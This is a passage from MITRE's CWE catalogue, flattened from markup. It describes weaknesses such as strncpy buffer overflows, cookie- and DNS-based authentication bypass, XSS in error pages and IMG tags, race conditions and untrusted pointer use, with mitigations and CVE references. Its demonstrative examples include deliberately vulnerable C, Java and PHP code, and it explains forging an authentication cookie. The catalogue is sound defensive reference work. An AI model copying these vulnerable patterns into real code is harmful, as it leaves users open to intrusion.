Compilation - Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. This is not necessarily a complete solution, since these canary-based mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. - - - Implementation - Programmers should adhere to the following rules when allocating and managing their applications memory: Double check that your buffer is as large as you specify. When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. Check buffer boundaries if calling this function in a loop and make sure there is no danger of writing past the allocated space. Truncate all input strings to a reasonable length before passing them to the copy and concatenation functions - - - Operation - Environment Hardening - - Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. - Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. - - Defense in Depth - This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61]. - Defense in Depth - This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Build and Compilation - Operation - Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution. - - - - - In the following example, the source character string is copied to the dest character string using the method strncpy. - - ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(source)-1);... - - However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below. - - ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(dest)-1);... - - - - In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file. - - #define LOG_INPUT_SIZE 40 - - // saves the file name to a log file - int outputFilenameToLog(char *filename, int length) { - int success; - - // buffer with size set to maximum size for input to log file - char buf[LOG_INPUT_SIZE]; - - // copy filename to buffer - strncpy(buf, filename, length); - - // save to log file - success = saveToLogFile(buf); - return success; - } - - However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below. - - ... - // copy filename to buffer - strncpy(buf, filename, sizeof(buf)-1);... - - - - - Memory - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2021-07-20 - updated Potential_Mitigations - - - - - The application uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism. - - Developers may assume that inputs such as cookies, environment variables, and hidden form fields cannot be modified. However, an attacker could change these inputs using customized clients or other attacks. This change might not be detected. When security decisions such as authentication and authorization are made based on the values of these inputs, attackers can bypass the security of the software. - Without sufficient encryption, integrity checking, or other mechanism, any input that originates from an outsider cannot be trusted. - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - High - - - Confidentiality - Access Control - Availability - Other - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Varies by Context - Attackers can bypass the security decision to access whatever is being protected. The consequences will depend on the associated functionality, but they can range from granting additional privileges to untrusted users to bypassing important security checks. Ultimately, this weakness may lead to exposure or modification of sensitive data, system crash, or execution of arbitrary code. - - - - - Manual Static Analysis - Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints. - High - The effectiveness and speed of manual analysis will be reduced if the there is not a centralized security mechanism, and the security logic is widely distributed throughout the software. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Architecture and Design - Attack Surface Reduction - - Store state information and sensitive data on the server side only. - Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions. - If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328). - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - With a stateless protocol such as HTTP, use a framework that maintains the state for you. - Examples include ASP.NET View State [REF-756] and the OWASP ESAPI Session Management feature [REF-45]. - Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Operation - Implementation - Environment Hardening - When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - - - Architecture and Design - Implementation - Attack Surface Reduction - - Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. - Identify all inputs that are used for security decisions and determine if you can modify the design so that you do not have to rely on submitted inputs at all. For example, you may be able to keep critical information about the user's session on the server side instead of recording it within external data. - - - - - - The following code excerpt reads a value from a browser cookie to determine the role of the user. - - Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("role")) {userRole = c.getValue();}} - - - - The following code could be for a medical records application. It performs authentication by checking if a cookie has been set. - - $auth = $_COOKIES['authenticated'];if (! $auth) {if (AuthenticateUser($_POST['user'], $_POST['password']) == "success") {// save the cookie to send out in future responsessetcookie("authenticated", "1", time()+60*60*2);}else {ShowLoginScreen();die("\n");}}DisplayMedicalHistory($_POST['patient_ID']); - - The programmer expects that the AuthenticateUser() check will always be applied, and the "authenticated" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. - However, the attacker can set the "authenticated" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication. - - - In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. - - Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) {authenticated = true;}} - - - - The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. - - struct hostent *hp;struct in_addr myaddr;char* tHost = "trustme.example.com";myaddr.s_addr=inet_addr(ip_addr_string); - hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {trusted = true;} else {trusted = false;} - - - String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith("trustme.com")) {trusted = true;} - - - IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith("trustme.com")) {trusted = true;} - - IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. - - - - - CVE-2009-1549 - Attacker can bypass authentication by setting a cookie to a specific value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549 - - - CVE-2009-1619 - Attacker can bypass authentication and gain admin privileges by setting an "admin" cookie to 1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619 - - - CVE-2009-0864 - Content management system allows admin privileges by setting a "login" cookie to "OK." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864 - - - CVE-2008-5784 - e-dating application allows admin privileges by setting the admin cookie to 1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784 - - - CVE-2008-6291 - Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to "admin." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291 - - - - - SEC09-J - Do not base security checks on untrusted sources - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-18 - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page. - - Error pages may include customized 403 Forbidden or 404 Not Found pages. - When an attacker can trigger an error that contains script syntax within the attacker's input, then cross-site scripting attacks may be possible. - - - - - - - - - Resultant - - - - - - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Availability - Read Application Data - Execute Unauthorized Code or Commands - - - - - Implementation - Do not write user-controlled input to error pages. - - - Implementation - Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - With Struts, write all data from form beans with the bean's filter attribute set to true. - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - CVE-2002-0840 - XSS in default error page from Host: header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0840 - - - CVE-2002-1053 - XSS in error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1053 - - - CVE-2002-1700 - XSS in error page from targeted parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1700 - - - - - XSS in error pages - - - SFP24 - Tainted input to command - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - XSS in Error Pages - Failure to Sanitize Directives in an Error Message Web Page - Improper Sanitization of Script in an Error Message Web Page - - - - The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute. - Attackers can embed XSS exploits into the values for IMG attributes (e.g. SRC) that is streamed and then executed in a victim's browser. Note that when the page is loaded into a user's browsers, the exploit will automatically execute. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Read Application Data - Execute Unauthorized Code or Commands - - - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - CVE-2006-3211 - Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211 - - - CVE-2002-1649 - javascript URI scheme in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1649 - - - CVE-2002-1803 - javascript URI scheme in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1803 - - - CVE-2002-1804 - javascript URI scheme in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1804 - - - CVE-2002-1805 - javascript URI scheme in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1805 - - - CVE-2002-1806 - javascript URI scheme in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1806 - - - CVE-2002-1807 - javascript URI scheme in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1807 - - - CVE-2002-1808 - javascript URI scheme in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1808 - - - - - Script in IMG tags - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Observed_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Script in IMG Tags - Failure to Sanitize Script in Attributes of IMG Tags in a Web Page - Improper Sanitization of Script in Attributes of IMG Tags in a Web Page - - - - The software utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource. - If access to a shared resource is not synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource. - - - - - - - - Integrity - Confidentiality - Other - Modify Application Data - Read Application Data - Alter Execution Logic - - - - - The following code intends to fork a process, then have both the parent and child processes print a single line. - - static void print (char * string) { - char * word;int counter;for (word = string; counter = *word++; ) { - putc(counter, stdout);fflush(stdout); - /* Make timing window a little larger... */ - - sleep(1); - } - } - int main(void) { - pid_t pid; - pid = fork();if (pid == -1) {exit(-2);}else if (pid == 0) {print("child\n");}else {print("PARENT\n");}exit(0); - } - - One might expect the code to print out something like: - - - PARENT - child - - - However, because the parent and child are executing concurrently, and stdout is flushed each time a character is printed, the output might be mixed together, such as: - - - PcAhRiElNdT - [blank line] - [blank line] - - - - - - - LCK05-J - Synchronize access to static fields that can be modified by untrusted code - - - - Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. - - - - CWE Content Team - MITRE - 2010-08-06 - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-09-23 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software utilizes a shared resource in a concurrent manner, but it does not correctly synchronize access to the resource. - If access to a shared resource is not correctly synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource. - - - - - - - - Integrity - Confidentiality - Other - Modify Application Data - Read Application Data - Alter Execution Logic - - - - Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. - - - - CWE Content Team - MITRE - 2010-08-06 - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-23 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The program obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer. - - An attacker can supply a pointer for memory locations that the program is not expecting. If the pointer is dereferenced for a write operation, the attack might allow modification of critical program state variables, cause a crash, or execute code. If the dereferencing operation is for a read, then the attack might allow reading of sensitive data, cause a crash, or set a program variable to an unexpected value (since the value will be read from an unexpected memory location). - There are several variants of this weakness, including but not necessarily limited to: - - - The untrusted value is directly invoked as a function call. - In OS kernels or drivers where there is a boundary between "userland" and privileged memory spaces, an untrusted pointer might enter through an API or system call (see CWE-781 for one such example). - Inadvertently accepting the value from an untrusted control sphere when it did not have to be accepted as input at all. This might occur when the code was originally developed to be run by a single user in a non-networked environment, and the code is then ported to or otherwise exposed to a networked environment. - - - - - - - - - - - - - Confidentiality - Read Memory - If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory. - - - Availability - DoS: Crash, Exit, or Restart - If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is "malformed" or larger than expected by a read or write operation, the application may terminate unexpectedly. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Modify Memory - If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. - - - - - CVE-2007-5655 - message-passing framework interprets values in packets as pointers, causing a crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5655 - - - CVE-2010-2299 - labeled as a "type confusion" issue, also referred to as a "stale pointer." However, the bug ID says "contents are simply interpreted as a pointer... renderer ordinarily doesn't supply this pointer directly". The "handle" in the untrusted area is replaced in one function, but not another - thus also, effectively, exposure to wrong sphere (CWE-668). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2299 - - - CVE-2009-1719 - Untrusted dereference using undocumented constructor. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1719 - - - CVE-2009-1250 - An error code is incorrectly checked and interpreted as a pointer, leading to a crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1250 - - - CVE-2009-0311 - An untrusted value is obtained from a packet and directly called as a function pointer, leading to code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0311 - - - CVE-2010-1818 - Undocumented attribute in multimedia software allows "unmarshaling" of an untrusted pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1818 - - - CVE-2010-3189 - ActiveX control for security software accepts a parameter that is assumed to be an initialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3189 - - - CVE-2010-1253 - Spreadsheet software treats certain record values that lead to "user-controlled pointer" (might be untrusted offset, not untrusted pointer). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1253 - - - - - - - There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. - Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. - Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples. - - - - CWE Content Team - MITRE - 2010-09-22 - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer. - - While a pointer can contain a reference to any arbitrary memory location, a program typically only intends to use the pointer to access limited portions of memory, such as contiguous memory used to access an individual array. - Programs may use offsets in order to access fields or sub-elements stored within structured data. The offset might be out-of-range if it comes from an untrusted source, is the result of an incorrect calculation, or occurs because of another error. - If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program. As a result, the attack might change the state of the software as accessed through program variables, cause a crash or instable behavior, and possibly lead to code execution. - - - - - - - - - - - Untrusted pointer offset - This term is narrower than the concept of "out-of-range" offset, since the offset might be the result of a calculation or other error that does not depend on any externally-supplied values. - - - - - Confidentiality - Read Memory - If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory. - - - Availability - DoS: Crash, Exit, or Restart - If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is "malformed" or larger than expected by a read or write operation, the application may terminate unexpectedly. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Modify Memory - If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. - - - - - CVE-2010-2160 - Invalid offset in undocumented opcode leads to memory corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2160 - - - CVE-2010-1281 - Multimedia player uses untrusted value from a file when using file-pointer calculations. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1281 - - - CVE-2009-3129 - Spreadsheet program processes a record with an invalid size field, which is later used as an offset. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3129 - - - CVE-2009-2694 - Instant messaging library does not validate an offset value specified in a packet. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694 - - - CVE-2009-2687 - Language interpreter does not properly handle invalid offsets in JPEG image, leading to out-of-bounds memory access and crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2687 - - - CVE-2009-0690 - negative offset leads to out-of-bounds read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690 - - - CVE-2008-4114 - untrusted offset in kernel - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114 - - - CVE-2010-2873 - "blind trust" of an offset value while writing heap memory allows corruption of function pointer,leading to code execution - 